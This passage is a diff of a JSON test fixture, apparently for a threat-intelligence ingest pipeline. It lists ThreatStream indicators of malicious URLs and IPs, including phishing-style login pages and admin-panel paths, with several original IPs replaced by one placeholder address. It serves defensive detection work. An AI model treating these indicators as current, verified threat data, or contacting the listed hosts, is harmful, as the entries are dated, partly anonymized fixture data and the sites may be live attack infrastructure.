"2021-12-13T05:57:34.386855698Z", - "original": "{\"created\":\"2020-02-08T14:02:23.507Z\",\"description\":\"TS ID: 55298070914; iType: mal_url; State: active; Org: Digital Ocean; Source: CyberCrime\",\"id\":\"indicator--7f6369a7-af79-45ca-96e4-3e5c309337de\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-24\"],\"modified\":\"2020-02-08T14:02:23.507Z\",\"name\":\"mal_url: http://178.62.186.112/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://178.62.186.112/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:23.507Z\"}", + "ingested": "2021-12-13T08:38:40.024875400Z", + "original": "{\"created\":\"2020-02-08T14:02:23.507Z\",\"description\":\"TS ID: 55298070914; iType: mal_url; State: active; Org: Digital Ocean; Source: CyberCrime\",\"id\":\"indicator--7f6369a7-af79-45ca-96e4-3e5c309337de\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-24\"],\"modified\":\"2020-02-08T14:02:23.507Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:23.507Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -18967,7 +18967,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 5.188.231.89", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55298068879; iType: mal_ip; State: active; Org: MoreneHost; Source: CyberCrime", "modified": "2020-02-08T14:02:23.547Z", "valid_from": "2020-02-08T14:02:23.547Z", @@ -18989,12 +18989,12 @@ "first_seen": "2020-02-08T14:02:23.547Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "5.188.231.89" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386860176Z", - "original": "{\"created\":\"2020-02-08T14:02:23.547Z\",\"description\":\"TS ID: 55298068879; iType: mal_ip; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--e1a9f3d2-0a84-4814-bac9-c9e60ad73cca\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-55\"],\"modified\":\"2020-02-08T14:02:23.547Z\",\"name\":\"mal_ip: 5.188.231.89\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '5.188.231.89']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:23.547Z\"}", + "ingested": "2021-12-13T08:38:40.024879900Z", + "original": "{\"created\":\"2020-02-08T14:02:23.547Z\",\"description\":\"TS ID: 55298068879; iType: mal_ip; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--e1a9f3d2-0a84-4814-bac9-c9e60ad73cca\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-55\"],\"modified\":\"2020-02-08T14:02:23.547Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:23.547Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -19044,7 +19044,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386864645Z", + "ingested": "2021-12-13T08:38:40.024883400Z", "original": "{\"created\":\"2020-02-08T14:02:33.679Z\",\"description\":\"TS ID: 55298069345; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--1aa4e592-6c78-43e8-b47c-2494a948d25c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-62\"],\"modified\":\"2020-02-08T14:02:33.679Z\",\"name\":\"mal_url: http://f0391897.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0391897.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:33.679Z\"}", "category": "threat", "type": "indicator", @@ -19063,7 +19063,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 190.14.38.202", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55298070323; iType: mal_ip; State: active; Org: Offshore Racks S.A; Source: CyberCrime", "modified": "2020-02-08T14:02:53.996Z", "valid_from": "2020-02-08T14:02:53.996Z", @@ -19085,12 +19085,12 @@ "first_seen": "2020-02-08T14:02:53.996Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "190.14.38.202" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386868782Z", - "original": "{\"created\":\"2020-02-08T14:02:53.996Z\",\"description\":\"TS ID: 55298070323; iType: mal_ip; State: active; Org: Offshore Racks S.A; Source: CyberCrime\",\"id\":\"indicator--0140ac57-a9a4-408a-9f53-f5b33f85dc80\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-21\"],\"modified\":\"2020-02-08T14:02:53.996Z\",\"name\":\"mal_ip: 190.14.38.202\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '190.14.38.202']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:53.996Z\"}", + "ingested": "2021-12-13T08:38:40.024888700Z", + "original": "{\"created\":\"2020-02-08T14:02:53.996Z\",\"description\":\"TS ID: 55298070323; iType: mal_ip; State: active; Org: Offshore Racks S.A; Source: CyberCrime\",\"id\":\"indicator--0140ac57-a9a4-408a-9f53-f5b33f85dc80\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-21\"],\"modified\":\"2020-02-08T14:02:53.996Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:53.996Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -19140,7 +19140,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386873902Z", + "ingested": "2021-12-13T08:38:40.024894900Z", "original": "{\"created\":\"2020-02-08T14:02:57.507Z\",\"description\":\"TS ID: 55298070037; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--46c21251-c655-40c1-896d-2f4712091b7b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-02-08T14:02:57.507Z\",\"name\":\"mal_url: http://nikitakoteqka1.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nikitakoteqka1.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:57.507Z\"}", "category": "threat", "type": "indicator", @@ -19192,7 +19192,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386878180Z", + "ingested": "2021-12-13T08:38:40.024919200Z", "original": "{\"created\":\"2020-02-08T14:02:59.236Z\",\"description\":\"TS ID: 55298072047; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--7921e9e8-393c-4b0d-888f-bea034112f06\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-08T14:02:59.236Z\",\"name\":\"mal_url: http://xgkxc.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://xgkxc.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:59.236Z\"}", "category": "threat", "type": "indicator", @@ -19243,7 +19243,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386882468Z", + "ingested": "2021-12-13T08:38:40.024949900Z", "original": "{\"created\":\"2020-02-08T14:02:59.246Z\",\"description\":\"TS ID: 55298071436; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--a59774c5-c288-44a0-9eab-28d93c5d0ab4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-08T14:02:59.246Z\",\"name\":\"mal_url: http://100stuff.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://100stuff.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:59.246Z\"}", "category": "threat", "type": "indicator", @@ -19262,7 +19262,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 81.4.100.75", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55298071076; iType: mal_ip; State: active; Org: RouteLabel V.O.F.; Source: CyberCrime", "modified": "2020-02-08T14:02:59.310Z", "valid_from": "2020-02-08T14:02:59.31Z", @@ -19284,12 +19284,12 @@ "first_seen": "2020-02-08T14:02:59.310Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "81.4.100.75" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386887337Z", - "original": "{\"created\":\"2020-02-08T14:02:59.31Z\",\"description\":\"TS ID: 55298071076; iType: mal_ip; State: active; Org: RouteLabel V.O.F.; Source: CyberCrime\",\"id\":\"indicator--d74f403a-0673-4594-a4fc-61a22ab7fa21\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-30\"],\"modified\":\"2020-02-08T14:02:59.31Z\",\"name\":\"mal_ip: 81.4.100.75\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '81.4.100.75']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:59.31Z\"}", + "ingested": "2021-12-13T08:38:40.024954500Z", + "original": "{\"created\":\"2020-02-08T14:02:59.31Z\",\"description\":\"TS ID: 55298071076; iType: mal_ip; State: active; Org: RouteLabel V.O.F.; Source: CyberCrime\",\"id\":\"indicator--d74f403a-0673-4594-a4fc-61a22ab7fa21\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-30\"],\"modified\":\"2020-02-08T14:02:59.31Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:59.31Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -19307,7 +19307,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 8.209.78.16", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55298069175; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime", "modified": "2020-02-08T14:02:59.432Z", "valid_from": "2020-02-08T14:02:59.432Z", @@ -19329,12 +19329,12 @@ "first_seen": "2020-02-08T14:02:59.432Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "8.209.78.16" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386892537Z", - "original": "{\"created\":\"2020-02-08T14:02:59.432Z\",\"description\":\"TS ID: 55298069175; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime\",\"id\":\"indicator--3cac5b3d-ffa6-4f5c-b190-7de9eb2e5a00\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-08T14:02:59.432Z\",\"name\":\"mal_ip: 8.209.78.16\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '8.209.78.16']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:59.432Z\"}", + "ingested": "2021-12-13T08:38:40.024960200Z", + "original": "{\"created\":\"2020-02-08T14:02:59.432Z\",\"description\":\"TS ID: 55298069175; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime\",\"id\":\"indicator--3cac5b3d-ffa6-4f5c-b190-7de9eb2e5a00\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-08T14:02:59.432Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:59.432Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -19385,7 +19385,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386897556Z", + "ingested": "2021-12-13T08:38:40.024968Z", "original": "{\"created\":\"2020-02-08T14:03:17.953Z\",\"description\":\"TS ID: 55298072311; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--86c43dc8-a27e-4f30-a29e-ba174f0a03ef\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-02-08T14:03:17.953Z\",\"name\":\"mal_url: http://bacanacabana.com.br/wp-includes/css/kay/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://bacanacabana.com.br/wp-includes/css/kay/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:17.953Z\"}", "category": "threat", "type": "indicator", @@ -19437,7 +19437,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386902776Z", + "ingested": "2021-12-13T08:38:40.024991900Z", "original": "{\"created\":\"2020-02-08T14:03:21.626Z\",\"description\":\"TS ID: 55298071960; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--d900b770-4f2f-4597-ba97-a3e62646eca8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-08T14:03:21.626Z\",\"name\":\"mal_url: http://xgkxc.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://xgkxc.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:21.626Z\"}", "category": "threat", "type": "indicator", @@ -19488,7 +19488,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386907545Z", + "ingested": "2021-12-13T08:38:40.024996400Z", "original": "{\"created\":\"2020-02-08T14:03:23.941Z\",\"description\":\"TS ID: 55298070427; iType: mal_url; State: active; Org: SBCLOUD; Source: CyberCrime\",\"id\":\"indicator--be5fb697-b554-4042-8185-f4148a5d02a2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-02-08T14:03:23.941Z\",\"name\":\"mal_url: http://boomcoins.ml/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://boomcoins.ml/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:23.941Z\"}", "category": "threat", "type": "indicator", @@ -19539,7 +19539,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386912144Z", + "ingested": "2021-12-13T08:38:40.025001600Z", "original": "{\"created\":\"2020-02-08T14:03:34.136Z\",\"description\":\"TS ID: 55298071042; iType: mal_url; State: active; Org: RouteLabel V.O.F.; Source: CyberCrime\",\"id\":\"indicator--31a6a6c3-f385-421f-9ebb-d5cdced1dfd5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-30\"],\"modified\":\"2020-02-08T14:03:34.136Z\",\"name\":\"mal_url: http://asstubevideos.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://asstubevideos.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:34.136Z\"}", "category": "threat", "type": "indicator", @@ -19590,7 +19590,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386916672Z", + "ingested": "2021-12-13T08:38:40.025025700Z", "original": "{\"created\":\"2020-02-08T14:03:34.507Z\",\"description\":\"TS ID: 55298069289; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--8c9846cd-2a0b-40c3-91f2-5893c05b1560\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-08T14:03:34.507Z\",\"name\":\"mal_url: http://f0397413.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0397413.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:34.507Z\"}", "category": "threat", "type": "indicator", @@ -19609,7 +19609,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 45.145.0.14", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55298071476; iType: mal_ip; State: active; Source: CyberCrime", "modified": "2020-02-08T14:03:42.075Z", "valid_from": "2020-02-08T14:03:42.075Z", @@ -19631,12 +19631,12 @@ "first_seen": "2020-02-08T14:03:42.075Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "45.145.0.14" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386921040Z", - "original": "{\"created\":\"2020-02-08T14:03:42.075Z\",\"description\":\"TS ID: 55298071476; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--4e5ac673-3459-45d1-817e-d7aca2850c5e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-08T14:03:42.075Z\",\"name\":\"mal_ip: 45.145.0.14\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '45.145.0.14']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:42.075Z\"}", + "ingested": "2021-12-13T08:38:40.025032100Z", + "original": "{\"created\":\"2020-02-08T14:03:42.075Z\",\"description\":\"TS ID: 55298071476; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--4e5ac673-3459-45d1-817e-d7aca2850c5e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-08T14:03:42.075Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:42.075Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -19686,7 +19686,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386925479Z", + "ingested": "2021-12-13T08:38:40.025036400Z", "original": "{\"created\":\"2020-02-08T14:03:42.298Z\",\"description\":\"TS ID: 55298069324; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--8d463a9a-c285-4af6-91e8-bfd7e65d820f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-08T14:03:42.298Z\",\"name\":\"mal_url: http://f0396512.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0396512.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:42.298Z\"}", "category": "threat", "type": "indicator", @@ -19737,7 +19737,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386929827Z", + "ingested": "2021-12-13T08:38:40.025042Z", "original": "{\"created\":\"2020-02-08T14:03:46.901Z\",\"description\":\"TS ID: 55298070290; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--bf76b431-6b24-4b63-89d6-4f026a2e5169\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-63\"],\"modified\":\"2020-02-08T14:03:46.901Z\",\"name\":\"mal_url: http://j1043204.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://j1043204.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:46.901Z\"}", "category": "threat", "type": "indicator", @@ -19788,7 +19788,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386934365Z", + "ingested": "2021-12-13T08:38:40.025049400Z", "original": "{\"created\":\"2020-02-08T14:03:47.108Z\",\"description\":\"TS ID: 55298069358; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--646c9b00-80f7-4457-b2bc-1da854c211d6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-08T14:03:47.108Z\",\"name\":\"mal_url: http://f0387320.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0387320.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:47.108Z\"}", "category": "threat", "type": "indicator", @@ -19840,7 +19840,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386938914Z", + "ingested": "2021-12-13T08:38:40.025054100Z", "original": "{\"created\":\"2020-02-08T14:03:50.674Z\",\"description\":\"TS ID: 55298072749; iType: mal_url; State: active; Org: SpaceWeb CJSC; Source: CyberCrime\",\"id\":\"indicator--48ad83a8-cec1-4d85-a9fd-1b7f9308cb6a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-02-08T14:03:50.674Z\",\"name\":\"mal_url: http://rqx10504bc.temp.swtest.ru/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://rqx10504bc.temp.swtest.ru/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:50.674Z\"}", "category": "threat", "type": "indicator", @@ -19892,7 +19892,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386943152Z", + "ingested": "2021-12-13T08:38:40.025058900Z", "original": "{\"created\":\"2020-02-08T14:03:53.621Z\",\"description\":\"TS ID: 55298069555; iType: mal_url; State: active; Org: OOO Network of data-centers Selectel; Source: CyberCrime\",\"id\":\"indicator--8e98212b-20f2-404f-804b-8ab7519c5683\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-02-08T14:03:53.621Z\",\"name\":\"mal_url: http://j6g3fzp.5k5.ru/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://j6g3fzp.5k5.ru/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:53.621Z\"}", "category": "threat", "type": "indicator", @@ -19943,7 +19943,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.387867657Z", + "ingested": "2021-12-13T08:38:40.025062500Z", "original": "{\"created\":\"2020-02-08T14:03:58.176Z\",\"description\":\"TS ID: 55298069681; iType: mal_url; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime\",\"id\":\"indicator--395e83ba-96c1-45d2-b4b2-c065af5547fe\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-08T14:03:58.176Z\",\"name\":\"mal_url: http://stableupdater.ru.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://stableupdater.ru.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:58.176Z\"}", "category": "threat", "type": "indicator", @@ -19995,7 +19995,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.387882415Z", + "ingested": "2021-12-13T08:38:40.025067500Z", "original": "{\"created\":\"2020-02-08T14:03:58.41Z\",\"description\":\"TS ID: 55298072652; iType: mal_url; State: active; Org: Netrouting; Source: CyberCrime\",\"id\":\"indicator--84dceb2a-fb38-4d98-9005-7f05460e8f3a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-48\"],\"modified\":\"2020-02-08T14:03:58.41Z\",\"name\":\"mal_url: http://209.182.217.85/auth.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://209.182.217.85/auth.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:58.41Z\"}", "category": "threat", "type": "indicator", @@ -20047,7 +20047,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.387889298Z", + "ingested": "2021-12-13T08:38:40.025074900Z", "original": "{\"created\":\"2020-02-08T14:04:30.627Z\",\"description\":\"TS ID: 55298073012; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--ca97a773-4de3-4c9d-8f4c-b7350a615c45\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-08T14:04:30.627Z\",\"name\":\"mal_url: http://fentq.org/x/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://fentq.org/x/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:30.627Z\"}", "category": "threat", "type": "indicator", @@ -20099,7 +20099,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.387894848Z", + "ingested": "2021-12-13T08:38:40.025082200Z", "original": "{\"created\":\"2020-02-08T14:04:30.659Z\",\"description\":\"TS ID: 55298072708; iType: mal_url; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime\",\"id\":\"indicator--d0653208-3d17-48c8-a47d-a6dede383ad8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-08T14:04:30.659Z\",\"name\":\"mal_url: http://castmart.ga/~zadmin/beta/aps/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://castmart.ga/~zadmin/beta/aps/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:30.659Z\"}", "category": "threat", "type": "indicator", @@ -20118,7 +20118,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 162.241.6.97", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55298072377; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime", "modified": "2020-02-08T14:04:30.733Z", "valid_from": "2020-02-08T14:04:30.733Z", @@ -20140,12 +20140,12 @@ "first_seen": "2020-02-08T14:04:30.733Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "162.241.6.97" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.387901621Z", - "original": "{\"created\":\"2020-02-08T14:04:30.733Z\",\"description\":\"TS ID: 55298072377; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--7873494f-24fb-42a6-ae17-299b9825e220\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-22\"],\"modified\":\"2020-02-08T14:04:30.733Z\",\"name\":\"mal_ip: 162.241.6.97\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = 